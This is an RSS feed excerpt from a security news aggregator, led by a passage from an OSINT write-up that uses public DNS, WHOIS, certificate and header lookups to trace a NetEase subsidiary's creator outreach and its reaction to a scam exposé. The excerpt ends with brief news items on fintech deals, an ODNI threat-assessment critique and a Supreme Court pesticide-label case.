Forbidden.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*J0SWjahx5ZdLP8Lbl4TARg.png"><figcaption>April 11 outreach — emoji-heavy, urgency-driven, no company branding</figcaption></figure><h3>Entry 2: SSL Certificate — Infrastructure Built Before the Campaign</h3><pre>$ echo | openssl s_client \<br>  -servername infunease.youdaoads.com \<br>  -connect infunease.youdaoads.com:443 2&gt;/dev/null \<br>  | openssl x509 -noout -dates<br><br>notBefore=Apr  5 00:00:00 2026 GMT<br>notAfter=Jul  4 23:59:59 2026 GMT</pre><p><strong>Certificate issued April 5</strong>–6 days before the emails went out. <strong>90-day certificate</strong> — automated issuance, short-term deployment pattern.</p><p>The infrastructure was being assembled in the week immediately preceding the mass outreach campaign.</p><h3>Entry 3: WHOIS — The Record That Updated After Publication</h3><pre>$ whois youdaoads.com<br><br>Domain Name:    YOUDAOADS.COM<br>Creation Date:  2021-05-25T11:15:53Z   ← 5 years old<br>Updated Date:   2026-04-14T05:35:38Z   ← 3 days post-article<br>Registrar:      Alibaba Cloud Computing (Beijing) Co., Ltd.<br>Registrant:     bei jing, CN<br>Name Servers:   REM1.YODAO.COM / REM2.YODAO.COM / REM3.YODAO.COM<br>DNSSEC:         unsigned</pre><p>The domain is legitimate and 5 years old. That’s important context.</p><p>But the record updated <strong>April 14</strong>–3 days after the article.</p><pre>$ whois infunease.youdaoads.com<br>No match for "INFUNEASE.YOUDAOADS.COM".</pre><p>The subdomain returns no WHOIS data.</p><h3>Entry 4: DNS Chain — Following the Infrastructure</h3><pre>$ dig infunease.youdaoads.com +short<br><br>youdaoads.youdao.com.<br>ead.alb.ntes53.netease.com.<br>hk-g1-hz.alb.ntes53.netease.com.<br>156.225.180.151<br>156.225.180.152</pre><p>Resolution chain:</p><pre>infunease.youdaoads.com<br>        ↓ CNAME<br>youdaoads.youdao.com<br>        ↓ CNAME<br>ead.alb.ntes53.netease.com       ← NetEase Load Balancer<br>        ↓ CNAME<br>hk-g1-hz.alb.ntes53.netease.com  ← Hong Kong Cluster<br>        ↓ A Records<br>156.225.180.151 / 156.225.180.152</pre><pre>$ whois 156.225.180.151<br><br>inetnum:  156.225.180.0 - 156.225.180.255<br>netname:  HongKong_NetEase_Interactive_Entertainment_Limited<br>descr:    HongKong NetEase Interactive Entertainment Limited<br>country:  HK</pre><p><strong>This is genuine NetEase infrastructure.</strong> Hong Kong datacenter. Enterprise load balancers. Not a rented VPS.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/957/1*JInM3k4r8pB7K0HNglhiGg.png"><figcaption>DNS chain resolves into NetEase Hong Kong infrastructure</figcaption></figure><h3>Entry 5: April 28 — The Site Comes Alive</h3><p>On the exact same day the takedown request arrived:</p><pre># April 11 — time of original article<br>$ curl -I https://infunease.youdaoads.com<br>HTTP/1.1 403 Forbidden<br>x-deny-reason: host_not_allowed<br>server: envoy<br><br># April 28 - day of takedown request<br>$ curl -I https://infunease.youdaoads.com<br>HTTP/2 200<br>server: YDWS<br>x-powered-by: Next.js<br>content-length: 374476<br>x-nextjs-cache: HIT<br>cache-control: s-maxage=31536000, stale-while-revalidate</pre><p>A full Next.js production deployment. Live. On the same day they asked me to take down the article.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/640/1*N-59qYaaFL02sHiBRsEKFQ.gif"><figcaption>403 on April 11. 200 on April 28. Same day as the takedown request.</figcaption></figure><h3>Entry 6: The Takedown Request</h3><pre>From: youdaoads@rd.netease.com<br>Subject: Clarification regarding your recent article<br><br>The misunderstandings in your article are currently <br>influencing Google's AI summaries, which is causing <br>severe and unearned damage to our brand.<br>We kindly request that you consider removing the post.<br>Domain Status: We have confirmed our domain is not <br>blocked by major security infrastructures.<br>NetEase Emails: Youdao Ads is a business division <br>of NetEase Youdao. The emails came from NetEase <br>internal servers because they are genuine official <br>communications.</pre><p>Note the sender domain: rd.netease.com — NetEase R&amp;D division. Original outreach: corp.netease.com — corporate division.</p><p>Two different NetEase subdomains used for the same operation. Never explained.</p><p>Simultaneously, a dev.to account named “Youdao Ads” posted publicly on my article:</p><blockquote>“We have thoroughly verified our domain and technical infrastructure. It is fully operational, passes mainstream security protocols, and is not being blocked by any standard security infrastructures.”</blockquote><p>My public response requested five items of documentation. None were provided.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*9Y-ly1FtXcs0bzFDwkv-qw.png"><figcaption>Note rd.netease.com — different subdomain from original corp.netease.com outreach</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/808/1*PCDJNyAiQ0AE9lYokCmVWA.png"><figcaption>Public comment on the article — same day as the takedown email</figcaption></figure><h3>Entry 7: The Trust Score Divergence</h3><p><strong>Scam Detector</strong> (independent, no business plans):</p><pre>April 11: 28.8/100 — "Risky. Dubious. Perilous."<br>April 28: 15/100  — continued decline post-publication</pre><p><strong>ScamAdviser</strong> (offers paid business verification plans):</p><pre>April 29: 100/100 — "Very Likely Safe"<br>Last Update: 3 weeks ago</pre><p>Two independent platforms. Same domain. 15/100 vs 100/100.</p><p>ScamAdviser offers business subscription plans that allow companies to submit documentation and improve their trust ratings. This is disclosed in their business model.</p><p>The Scam Detector score — which does not offer paid improvement plans — continued declining.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*EY-jvLqhGbJCay1gGJXy2g.png"><figcaption>April 29 — ScamAdviser shows 100/100. ScamAdviser offers paid business plans.</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/640/1*khCAckPTgdLynqcdvh6JUg.gif"><figcaption>Scam Detector (no paid plans) shows 15/100 — continued decline post-article</figcaption></figure><h3>Entry 8: Network Analysis — Behavioral Tracking on Login Page</h3><p>DevTools analysis of the login page:</p><h3>Session 1: 16 requests</h3><pre>16/24 requests<br>POST → https://k.clarity.ms/collect<br>Status: 204 No Content<br>Remote Address: 172.175.38.6:443</pre><h3>Session 2 (after continued analysis): 47 requests</h3><pre>47/63 requests<br>62.5 kB transferred<br>Server: YDWS</pre><p>Microsoft Clarity captures on every visit from page load:</p><ul><li>Full mouse movement recording</li><li>Click and scroll behavior</li><li>Session duration and depth</li><li>Browser and device fingerprint</li><li>Rage clicks, dead clicks</li></ul><p><strong>Active before any signup or consent interaction.</strong></p><p>A second endpoint revealed the origin:</p><pre>GET https://overseacdn.ydstatic.com/overseacdn/<br>    advertising_platform/static/intl/zh-CN.json<br>    ?v=2760e8bced<br><br>Server: YDWS<br>Content-Type: application/json<br>Akamai-Mon-lucid-Del: 1273563</pre><p>ydstatic.com — Youdao Static CDN. zh-CN.json — Chinese Simplified localization. Akamai CDN headers — enterprise-grade infrastructure.</p><p><strong>This platform was originally built for the Chinese market.</strong></p><p>Note: Clarity automatically masks password and email input fields. Credentials are not captured. Full behavioral profiling is active regardless.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*02O0pRa0KAMfaty6o0XuBg.png"><figcaption>DevTools — 47/63 collect requests with overseacdn endpoint visible</figcaption></figure><h3>Entry 9: The Email That Changes Everything</h3><p>April 29. One day after the takedown request.</p><pre>From: tangxi03@corp.netease.com<br>Subject: Official Collaboration Invite for Creators | <br>         Youdao Ads by NetEase Youdao<br>mailed-by:  corp.netease.com<br>signed-by:  corp.netease.com<br>⭐ Important according to Google</pre><p>Body:</p><pre>This email is from Youdao Ads — the official influencer <br>marketing platform of NetEase Youdao, a subsidiary of <br>NetEase.<br><br>Why partner with Youdao Ads?<br>▸ Exclusive opportunities with top global brands<br>▸ Guaranteed paid campaigns, no upfront fees, <br>  on-time secure payments<br>▸ Full dedicated support from onboarding to <br>  payment settlement<br>[NetEase 網易 | youdao Ads]<br>Global leading influencer marketing platform<br>ydcommunity@service.netease.com</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*TkfqyLMor69VNv6pk2hEmA.png"><figcaption>New email from tangxi03 — professional NetEase branding</figcaption></figure><h3>The Before/After: A Direct Comparison</h3><p>This is the finding that makes this investigation significant.</p><h3>April 11 — Original Outreach:</h3><pre>Subject:  "Don't scroll past – a paid collab <br>           that's actually your vibe 😉"<br><br>Content:<br>❌ Emoji-heavy throughout<br>❌ "Budget's ready – just name your rate"<br>❌ "Spots are filling up" (artificial urgency)<br>❌ WhatsApp group invite links<br>❌ Discord community links<br>❌ Zero company branding<br>❌ Generic "your vibe" personalization<br>❌ No official email for support</pre><h3>April 29 — Post-Article Outreach:</h3><pre>Subject:  "Official Collaboration Invite for Creators | <br>           Youdao Ads by NetEase Youdao"<br><br>Content:<br>✅ Zero emojis<br>✅ "No upfront fees" ← Part 1 raised payment concerns<br>✅ "No pressure to sign up immediately" ← Part 1 raised urgency concern<br>✅ "Transparent pricing" ← Part 1 raised opacity concern<br>✅ Official NetEase 網易 logo from line 1<br>✅ Official support email: ydcommunity@service.netease.com<br>✅ Zero WhatsApp links<br>✅ Zero Discord spam<br>✅ Clear company identification</pre><p>Every documented red flag from Part 1. Addressed in the next outreach email. The timing is not coincidental.</p><h3>Analysis: What the Evidence Supports</h3><h3>Confirmed:</h3><p><strong>The infrastructure is genuine NetEase.</strong> DNS chain, IP WHOIS, email authentication, CDN — all resolve to NetEase Hong Kong. This is not spoofed.</p><p><strong>The domain has 5 years of history.</strong> Registered May 2021. Legitimate age, legitimate registrar.</p><p><strong>The outreach behavior changed after public scrutiny.</strong> The before/after email comparison documents this directly.</p><p><strong>Reputation management was deployed.</strong> ScamAdviser showing 100/100 the day after the takedown request, while Scam Detector continues at 15/100, suggests active reputation management through paid platforms.</p><h3>Not confirmed:</h3><p><strong>Why was the site returning 403 during the active email campaign?</strong> You do not send mass creator outreach from a platform that returns Forbidden to visitors.</p><p><strong>Why did the WHOIS record update 3 days after publication?</strong> Domain records do not update without deliberate action.</p><p><strong>Why did the site go live on the same day as the takedown request?</strong> This correlation is documented. Causation is not established.</p><p><strong>Why the subdomain switching?</strong> corp.netease.com → rd.netease.com → corp.netease.com. Three different senders. No explanation provided.</p><p><strong>Why does Scam Detector still show 15/100?</strong> No documentation addressing this was ever provided.</p><h3>Most likely explanation:</h3><p>A legitimate NetEase subsidiary operating with immature, spam-adjacent outreach practices — possibly a team that grew quickly and prioritized reach over compliance. Public scrutiny forced an internal correction.</p><p>This is not a vindication. This is a more accurate conclusion.</p><h3>Security Lessons for the Community</h3><h3>1. Email authentication is necessary, not sufficient</h3><pre>DKIM: pass ✅<br>SPF:  pass ✅<br>DMARC: pass ✅<br>Intent: unknown ❌</pre><p>Authentication confirms origin. It does not confirm legitimacy of purpose.</p><h3>2. Infrastructure legitimacy ≠ operational legitimacy</h3><p>Enterprise CDN, real IPs, genuine corporate email — none of this guarantees the outreach practices are acceptable.</p><h3>3. Trust score platforms are not equal</h3><p>Some platforms offer paid business plans that allow score improvement. Others do not. Understanding the business model of the platform you’re citing matters in security research.</p><h3>4. Timeline documentation is the methodology</h3><pre># Every finding in this article is reproducible<br><br>$ dig infunease.youdaoads.com +short<br>$ echo | openssl s_client -servername infunease.youdaoads.com \<br>  -connect infunease.youdaoads.com:443 2&gt;/dev/null \<br>  | openssl x509 -noout -dates<br>$ whois youdaoads.com<br>$ curl -I https://infunease.youdaoads.com</pre><p>Public record data. Standard OSINT methodology. Anyone can verify.</p><h3>5. Public research creates accountability</h3><p>One technical article, properly documented and indexed, changed the outreach behavior of a subsidiary of a multi-billion dollar company within 18 days.</p><p>This is why transparent security research matters.</p><h3>What Remains Open</h3><p>I formally requested the following on April 28. No response received as of publication:</p><ol><li>Official business registration documents for Youdao Ads</li><li>NetEase Youdao official statement authorizing the outreach campaign</li><li>Verified creator partnership examples with creator consent</li><li>Explanation of security vendor scores and remediation steps</li><li>Clarification on subdomain switching across communications</li></ol><p>This article updates publicly and prominently when documentation arrives.</p><h3>Conclusion</h3><p>This started as a scam analysis. It became something more useful: a documented case study in how public technical scrutiny can change corporate behavior, the limitations of email authentication as a trust signal, and the importance of understanding the business models behind reputation platforms.</p><p>The infrastructure is real. The company is real. The outreach tactics were unacceptable. The response to scrutiny was managed and calculated.</p><p><strong>Draw your own conclusions.</strong></p><p>If you have received emails from Youdao Ads — as a creator, agency, or brand — your experience is relevant to this investigation. Share it in the responses.</p><h3>Technical Reference</h3><p><strong>All commands used in this investigation:</strong></p><pre># DNS Resolution<br>$ dig infunease.youdaoads.com +short<br><br># SSL Certificate Dates<br>$ echo | openssl s_client \<br>  -servername infunease.youdaoads.com \<br>  -connect infunease.youdaoads.com:443 2&gt;/dev/null \<br>  | openssl x509 -noout -dates<br># WHOIS Domain<br>$ whois youdaoads.com<br>$ whois infunease.youdaoads.com<br># IP WHOIS<br>$ whois 156.225.180.151<br># HTTP Headers<br>$ curl -I https://infunease.youdaoads.com</pre><p><strong>Reporting channels:</strong></p><ul><li>APWG: reportphishing@apwg.org</li><li>Google Safe Browsing: safebrowsing.google.com/safebrowsing/report_phish/</li><li>NetEase Security: security@netease.com</li></ul><p><em>Originally published on </em><a href="https://dev.to/freerave/exposed-the-youdao-ads-influencer-marketing-scam-technical-analysis-red-flags-5cag"><em>dev.to/freerave</em></a></p><p><em>All findings are based on public record data and standard OSINT methodology. Timestamps and commands are included verbatim for independent verification.</em></p><p>Hi InfoSec Write-ups team,</p><p>I’d like to submit Part 2 of an active <br>cybersecurity investigation.</p><p>Part 1 is already live on:</p><p>→ Medium:<br><a href="https://medium.com/@freerave/exposed-the-youdao-ads-influencer-marketing-scam-e389a0fb3f3c">https://medium.com/@freerave/exposed-the-youdao-ads-influencer-marketing-scam-e389a0fb3f3c</a></p><p>→ dev.to:<br><a href="https://dev.to/freerave/exposed-the-youdao-ads-influencer-marketing-scam-technical-analysis-red-flags-5cag">https://dev.to/freerave/exposed-the-youdao-ads-influencer-marketing-scam-technical-analysis-red-flags-5cag</a></p><p>→ Hashnode:<br><a href="https://freerave.hashnode.dev/exposed-the-youdao-ads-influencer-marketing-scam-technical-analysis-red-flags">https://freerave.hashnode.dev/exposed-the-youdao-ads-influencer-marketing-scam-technical-analysis-red-flags</a></p><p>Part 1 was cited by Google AI in search <br>results for “Youdao Ads scam” and prompted <br>a direct takedown request from the company <br>within 17 days of publication.</p><p>Part 2 dev.to link:</p><p><a href="https://dev.to/freerave/part-2-i-published-a-scam-expose-netease-sent-a-takedown-request-then-they-rewrote-their-entire-hip">https://dev.to/freerave/part-2-i-published-a-scam-expose-netease-sent-a-takedown-request-then-they-rewrote-their-entire-hip</a></p><p>Thank you.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=bc420e0bbc00" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/part-2-i-published-a-scam-expose-bc420e0bbc00">PART 2: I Published a Scam Expose.</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bakkt Acquires DTR to Build Stablecoin Settlement Layer]]></title>
<description><![CDATA[Bakkt has completed its acquisition of Distributed Technologies Research to support its plans for a digital settlement layer. The deal combines Bakkt’s institutional infrastructure with DTR’s stablecoin technology and payments engine for round-the-clock settlement services.]]></description>
<link>https://tsecurity.de/de/3480422/it-nachrichten/bakkt-acquires-dtr-to-build-stablecoin-settlement-layer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3480422/it-nachrichten/bakkt-acquires-dtr-to-build-stablecoin-settlement-layer/</guid>
<pubDate>Fri, 01 May 2026 15:31:41 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Bakkt has completed its acquisition of Distributed Technologies Research to support its plans for a digital settlement layer. The deal combines Bakkt’s institutional infrastructure with DTR’s stablecoin technology and payments engine for round-the-clock settlement services.]]></content:encoded>
</item>
<item>
<title><![CDATA[ODNI to CISOs on threat assessments: You’re on your own]]></title>
<description><![CDATA[Every year, CISOs, CSOs, and chief risk officers pore over the Office of the Director of National Intelligence (ODNI)’s Annual Threat Assessment (ATA) for insights on emerging threats they may soon face. This year, however, structural changes to the report itself underscore a foundational shift t...]]></description>
<link>https://tsecurity.de/de/3476924/it-security-nachrichten/odni-to-cisos-on-threat-assessments-youre-on-your-own/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3476924/it-security-nachrichten/odni-to-cisos-on-threat-assessments-youre-on-your-own/</guid>
<pubDate>Thu, 30 Apr 2026 11:06:06 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Every year, CISOs, CSOs, and chief risk officers pore over the Office of the Director of National Intelligence (ODNI)’s Annual Threat Assessment (ATA) for insights on emerging threats they may soon face. This year, however, structural changes to the report itself underscore a foundational shift that CISOs, CSOs, and CROs must pay attention to.</p>



<p>In March, <a href="https://www.dni.gov/files/ODNI/documents/assessments/ATA-2026-Unclassified-Report.pdf">ODNI issued its 2026 ATA</a>, describing threats to the United States as assessed by the Intelligence Community (IC) writ large. The 2026 ATA has seen a notable bifurcation. While still of use for the CISO/CSO/CRO, it has moved from a global, future-leaning assessment to a report of decidedly active operational reporting. Secondly, it has shifted its focus toward the “Homeland” at the expense of foreign adversary projection, most notably the absence of standalone sections on China, Russia, Iran, and the Democratic People’s Republic of Korea (DPRK).</p>



<p>This structural shift is a signal of intelligence contraction. Based on this ATA, the IC has moved from forecasting long-term adversary intent to reporting on immediate domestic stability. The implicit message to the private sector is clear: You are largely on your own.</p>



<h2 class="wp-block-heading">The infrastructure blind spot: Omitted successes</h2>



<p>Analytically, the most obvious shift in the ATA from the CISO perspective is the omission of the systemic infrastructure vetting that defined the <a href="https://www.dni.gov/files/ODNI/documents/assessments/ATA-2025-Unclassified-Report.pdf">2025 ATA.</a></p>



<p>The IC appears to assume the story of infrastructure infiltration has been “told.” While the 2025 report provided robust tracking of named campaigns such as <a href="https://www.csoonline.com/article/3497078/chinas-volt-typhoon-exploits-versa-zero-day-to-hack-us-isps-and-it-firms.html">Volt Typhoon</a> and <a href="https://www.csoonline.com/article/4047953/salt-typhoon-apt-techniques-revealed-in-new-report.html">Salt Typhoon</a>, which detailed the pre-positioning of access in US water and power, that level of granular visibility is now missing.</p>



<p>This is a dangerous assumption because “pre-positioning” does not expire. By pivoting away from these long-term “hidden wars,” the 2026 report tethers cyber analysis almost exclusively to active kinetic conflict. We are now being briefed on reactive events, such as retaliatory strikes against medical technology firms, rather than the persistent, systemic infiltration of the infrastructure, supply chains, and company grids.</p>



<h2 class="wp-block-heading">The bifurcated framework: Operational reporting vs. homeland focus</h2>



<p>The report now operates on two distinct tracks that risk narrowing the threat horizon for CROs. In a departure from traditional probabilistic forecasting, the IC has transitioned toward active operational reporting. This shift prioritizes immediate success metrics, such as a significant drop in border encounters and fentanyl seizures, framing these as clear operational wins.</p>



<p>For the enterprise, this signals a significant contraction of the “early warning” function. Rather than receiving a strategic roadmap regarding the evolution of adversary strategy, security leaders are being briefed on the tactical aftermath of US policy.</p>



<p>Parallel to this operational pivot is a decisive movement toward a homeland-centric defensive posture. This pivot has effectively eclipsed foreign adversary projection as the lead intelligence priority. The IC has elevated domestic ideological infiltration to a primary concern, identifying specific ideological movements as fundamental threats to Western principles and foundational security.</p>



<p>This internal focus is paired with a massive reinvestment in domestic kinetic defense, exemplified by the Golden Dome for America. With the global missile threat projected to reach 16,000 by 2035, the intelligence focus has turned inward to defend the US interior, leaving the private sector to bridge the gap in understanding how foreign adversaries are adapting in the shadows.</p>



<h2 class="wp-block-heading">Adversary status: The regional dissipation</h2>



<p>The structural shift in the 2026 assessment is more than a change in document formatting; it is a signal of intelligence contraction.</p>



<p>By prioritizing immediate domestic metrics and homeland defense, the ODNI’s ATA has effectively dispersed the threats, essentially outsourcing the strategic heavy lifting to the private sector. The implicit message is clear: The government is now tracking the aftermath of its policies, but the burden of forecasting adversary adaptation and long-term intent now rests entirely on your shoulders.</p>



<p>From this jaded eye, the following are the most glaring omissions:</p>



<h3 class="wp-block-heading">China: The illusion of economic pragmatism</h3>



<p>The 2026 report has effectively archived the systemic threat posed by the People’s Republic of China, omitting the robust tracking of named infrastructure campaigns like Volt Typhoon and Salt Typhoon that defined the 2025 brief.</p>



<p>By folding China into a broader Asia regional challenge, the IC has swapped strategic warning for a narrative of economic pragmatism. The report prioritizes the Busan Agreement and the lack of a fixed 2027 invasion timeline for Taiwan as signs of a stable relationship.</p>



<p>For the C-suite, this is a dangerous dilution. China has had and continues to have an all-of-government and nation approach to adversarial relationships, to include preparing the technological environments for future conflict. The absence of reporting on pre-positioned cyber access does not mean that access has been removed; it simply means the ODNI chose not to share information about it.</p>



<h3 class="wp-block-heading">Russia: The neighborhood challenger</h3>



<p>Russia has been downgraded from a global spoiler to a neighborhood challenger focused on the Arctic and its immediate near abroad.</p>



<p>The 2026 assessment omits the detailed analysis of Russian hybrid warfare and de-dollarization strategies that were hallmarks of prior years. In addition, the Russian misinformation and disinformation capabilities targeting the United States and other nations is largely omitted.</p>



<p>Instead, it signals a desire for a geostrategic thaw contingent on a settlement in Ukraine. This regional focus masks Moscow’s continued development of asymmetric capabilities, such as satellite-based nuclear weapons and gray zone tools, which remain persistent threats to global enterprise operations regardless of a localized ceasefire.</p>



<h3 class="wp-block-heading">The Democratic People’s Republic of Korea: The invisible proxy</h3>



<p>The DPRK has nearly vanished as a standalone strategic priority. The 2026 report omits the deep-dive analysis into Pyongyang’s nuclear brinkmanship, viewing the regime instead through the lens of its tactical partnership with Russia.</p>



<p>While the report briefly mentions the $1 billion dollars annually netted through cybercrime, it fails to project how the regime’s new combat experience in Europe will refine its special operations or its <a href="https://www.csoonline.com/article/4033022/how-not-to-hire-a-north-korean-it-spy-3.html">human insider infiltration tactics</a>. By treating the nation as a secondary proxy, the ODNI ignores its agile evolution into an independent, global cyber-mercenary force.</p>



<h3 class="wp-block-heading">Iran: The fragmented adversary</h3>



<p>The most significant omission regarding Iran is the lack of a projected roadmap for its asymmetric recovery.</p>



<p>The 2026 assessment characterizes the regime as severely degraded and facing its most fragile internal state since the 1980s. Given the assessment that was issued two weeks into Operation Epic Fury, it fails to address how Tehran will adapt its “Axis of Resistance” into a more decentralized, cyber-centric threat.</p>



<p>For the enterprise, the report’s focus on internal survival obscures a capacity for opportunistic, retaliatory strikes against Western commercial interests, a vector that often intensifies when a regime feels its conventional power is slipping. Now, 60-plus days into Operation Epic Fury, Iran’s capabilities remain, albeit in a degraded capacity.</p>



<h2 class="wp-block-heading">Actionable close: The resilience premium framework</h2>



<p>The 2026 ATA marks a departure from systemic state-actor tracking, signaling that the burden of discovery and long-term strategic defense has shifted to the private sector.</p>



<p>CISOs and CROs must fund a “resilience premium” (cybersecurity spend) to address these emerging operational specifics. This investment represents a fundamental analytic pivot, namely prioritizing resilience over pure efficiency to ensure task-critical assets remain functional during systemic shocks.</p>



<p>Here are four domains where CISOs and CROs should take action to ensure resilience:</p>



<p><strong>1. Identity and insider integrity (the human vector):</strong></p>



<ul class="wp-block-list">
<li><strong>Action:</strong> Overhaul identity proofing for remote hires to counter the <a href="https://www.csoonline.com/article/4143199/north-korean-fake-it-worker-tradecraft-exposed.html">DPRK’s agile use of IT workers</a> with falsified credentials to gain “human insider access.”</li>



<li><strong>Action:</strong> <a href="https://www.csoonline.com/article/4143393/the-insider-threat-rises-again.html">Expand insider threat programs</a> beyond data theft to include utilization of enterprise resources by those sympathetic to an “ideological” segment. The ATA would have one create an “ideological radicalization” detection capability, when the reality is a robust <a href="https://www.csoonline.com/article/4064326/coherence-insider-risk-strategys-new-core-principle.html">insider program focused on coherence, behavior, and intent</a> will serve one well.</li>
</ul>



<p><strong>2. Infrastructure continuity (the “Typhoon” legacy):</strong></p>



<ul class="wp-block-list">
<li><strong>Action:</strong> Conduct a “dormant access audit” of all industrial control systems (ICS). Since the IC has ceased public tracking of specific pre-positioning campaigns, the burden of identifying these “held in reserve” disruptive options now rests entirely on you.</li>



<li><strong>Action:</strong> Execute a C-suite tabletop focused on a “regional escalation” scenario where pre-positioned access is triggered during geopolitical tension. Include the loss of infrastructure due to kinetic events as witnessed when the UAE sustained damage to key buildings, some of which hosted the regional support for Amazon Web Services (AWS).</li>
</ul>



<p><strong>Algorithmic defense (AI and quantum):</strong></p>



<ul class="wp-block-list">
<li><strong>Action:</strong> <a href="https://www.csoonline.com/article/3552701/the-cisos-guide-to-establishing-quantum-resilience.html">Re-baseline quantum migration roadmaps</a> with an 18-to-24-month hard deadline for crown-jewel systems. The IC assesses the threat of a cryptographically relevant quantum computer (CRQC) as an extraordinary technological advantage that will break current encryption protecting finance and healthcare data.</li>



<li><strong>Action:</strong> Force-multiply the defensive stack with <a href="https://www.csoonline.com/article/3822459/what-is-anomaly-detection-behavior-based-analysis-for-cyber-threats.html">AI-driven anomaly detection</a> to counter the adversary’s use of AI as a defining technology to accelerate the speed and scale of cyber operations.</li>
</ul>



<p><strong>Intelligence integration:</strong></p>



<ul class="wp-block-list">
<li><strong>Action:</strong> Deepen public-private intelligence flows via <a href="https://www.csoonline.com/article/567485/what-is-an-isac-or-isao-how-these-cyber-threat-information-sharing-organizations-improve-security.html">Information Sharing and Analysis Centers (ISACs)</a> and direct agency relationships. Use the 2026 ATA’s shift to “active operational reporting” as the catalyst for establishing more robust, independent bilateral sharing agreements.</li>
</ul>



<p>In closing, the 2026 ATA told us what has already happened. The enterprise’s job now is to figure out what happens next. You have the remit and the tools, formulate the plan and act.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[RedStone Launches Settlement Layer For DeFi Lending, Aims to Use Tokenised RWAs]]></title>
<description><![CDATA[RedStone has launched a settlement layer aimed at enabling tokenised real-world assets to be used as collateral in DeFi lending. The system introduces an on-chain auction mechanism to address liquidity challenges and unlock idle RWA capital within decentralised finance.]]></description>
<link>https://tsecurity.de/de/3473937/it-nachrichten/redstone-launches-settlement-layer-for-defi-lending-aims-to-use-tokenised-rwas/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3473937/it-nachrichten/redstone-launches-settlement-layer-for-defi-lending-aims-to-use-tokenised-rwas/</guid>
<pubDate>Wed, 29 Apr 2026 11:46:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[RedStone has launched a settlement layer aimed at enabling tokenised real-world assets to be used as collateral in DeFi lending. The system introduces an on-chain auction mechanism to address liquidity challenges and unlock idle RWA capital within decentralised finance.]]></content:encoded>
</item>
<item>
<title><![CDATA[Supreme Court Hears Case On How To Label Risks of Popular Weed Killer]]></title>
<description><![CDATA[An anonymous reader quotes a report from NPR: A divided U.S. Supreme Court on Monday heard a dispute over labels on the popular Roundup weed killer, which thousands of people blame for their cancers. How the Supreme Court rules could have implications for tens of thousands of lawsuits against Rou...]]></description>
<link>https://tsecurity.de/de/3471690/it-security-nachrichten/supreme-court-hears-case-on-how-to-label-risks-of-popular-weed-killer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3471690/it-security-nachrichten/supreme-court-hears-case-on-how-to-label-risks-of-popular-weed-killer/</guid>
<pubDate>Tue, 28 Apr 2026 17:05:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from NPR: A divided U.S. Supreme Court on Monday heard a dispute over labels on the popular Roundup weed killer, which thousands of people blame for their cancers. How the Supreme Court rules could have implications for tens of thousands of lawsuits against Roundup maker Monsanto, which is now owned by Bayer. The case centers on who decides about warning labels on chemicals: the federal government -- or states or juries. [...] The justices will not be evaluating whether glyphosate causes cancer. Rather, they'll consider who should decide what appears on warning labels and whether states have a role to play after the EPA weighs in.
 
The current U.S. solicitor general backed Monsanto. Sarah Harris, his principal deputy, said the Environmental Protection Agency is in the driver's seat, not anyone in Missouri. "Missouri thus requires adding cancer warnings but federal law requires EPA to approve new warnings and tasks EPA with deciding what label changes would mitigate any health risks," Harris argued. "State law must give way." Several justices, including Brett Kavanaugh, appeared to agree with Monsanto's argument about the need for a single, uniform standard across the country.
 
But others, like Chief Justice John Roberts, wondered what would happen if the federal government moved more slowly than states did, who wanted to act quickly on information about new dangers. "Well, it does undermine the uniformity," Roberts said. "On the other hand, if it turns out they were right, it might have been good if they had an opportunity to do something, to call this danger to the attention of people while the federal government was going through its process," he said about states.
 
Justice Ketanji Brown Jackson asked about the emergence of new science, and the EPA's reviews. "There's a 15-year window between when that product has to be re-registered again and lots of things can happen in science, in terms of development about the product," she said. Bayer, which now owns Monsanto, only sells Roundup that contains glyphosate to farmers and businesses these days. Bayer has been pushing to resolve scores of the residential cases through a sweeping settlement, trying to put the costly claims behind it.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Supreme+Court+Hears+Case+On+How+To+Label+Risks+of+Popular+Weed+Killer%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F04%2F28%2F0421237%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F04%2F28%2F0421237%2Fsupreme-court-hears-case-on-how-to-label-risks-of-popular-weed-killer%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



